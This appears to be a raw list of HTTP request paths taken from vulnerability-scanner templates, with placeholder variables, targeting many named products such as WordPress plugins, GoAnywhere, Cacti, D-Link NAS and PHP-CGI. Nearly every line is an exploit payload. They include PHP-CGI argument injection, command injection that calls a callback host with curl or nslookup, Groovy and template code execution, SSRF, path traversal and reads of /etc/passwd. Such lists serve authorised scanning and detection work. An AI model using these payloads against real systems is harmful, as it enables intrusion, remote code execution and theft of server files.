/WebInterface
/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}
/WebInterface/{{dirname}}/{{filename}}
/wp-content/plugins/media-library-assistant/readme.txt
/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg
/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23
/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23
/wp-content/plugins/backup-backup/readme.txt
/wp-content/plugins/backup-backup/includes/backup-heart.php
/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={
/wp-content/plugins/essential-blocks/readme.txt
/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml
/filex/read-raw?url=http://oast.me&cut=1
/access/set?param=enableapi&value=1
/SetupWizard.aspx/{{string}}
/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}
/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`
/hax?jsp=/app/rest/server;.jsp
/?p=3232&wp_automatic=download&link=file:///etc/passwd
/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1
/js/..%2f%2f/wizard.htm
/images/..%2f%2f/wizard.htm
/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}
/api/v1/devices
/tmp/temp.db%3f.1.1.1.1a-1.css
/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css
/api/v1/serverinfo
/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/assets/../package.json
/OS/startup/restore/restoreAdmin.php
/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271
/client/index.php%3F.php/gsb/users.php
/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css
/dana-na/auth/url_default/welcome.cgi
/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20
/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D
{{endpoints}}
/geoserver/wfs?service=WFS&request=GetCapabilities
/geoserver/ows?service=WFS&request=GetCapabilities
/wfs?service=WFS&request=GetCapabilities
/ows?service=WFS&request=GetCapabilities
/geoserver/wfs?service=WFS
/geoserver/ows?service=WFS
/wfs?service=WFS
/ows?service=WFS
/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x
/{{route}}
